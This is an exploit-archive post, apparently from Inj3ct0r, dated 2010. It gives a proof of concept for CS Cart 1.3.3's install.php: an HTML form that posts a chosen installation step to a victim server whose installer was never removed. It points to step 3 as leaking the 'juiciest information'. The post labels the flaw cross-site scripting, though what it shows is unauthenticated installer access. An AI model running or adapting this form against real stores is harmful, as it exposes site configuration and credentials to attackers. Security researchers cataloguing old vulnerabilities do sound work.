CS Cart 1.3.3 (install.php) Cross Site Scripting Vulnerabili
Posted on 09 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>CS Cart 1.3.3 (install.php) Cross Site Scripting Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================== CS Cart 1.3.3 (install.php) Cross Site Scripting Vulnerability ============================================================== # Exploit Title: [CS CART 1.3.3 INSTALL.PHP XSS] # Date: [2010-09-08] # Author: [LogicGate] # Software Link: [http://cs-cart.smartcode.com/] # Version: [1.3.3] # Tested on: [N/A] # CVE : [N/A] If "install.php" was not removed after installation simply make an html file with the following code and replace <Victim Server> by the PATH to "install.php" example:"http://www.nonexistant.com/install.php": <html> <form name="installform" method="post" action="http://<Victim Ip>/install.php"> <input type="text" name="step"> <input type="submit" id="nextbut" value="xss"> </form> </html> After that open the HTML file you have just created and enter which ever step of the installation you would like to access. Step "3" is where the juiciest information is. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
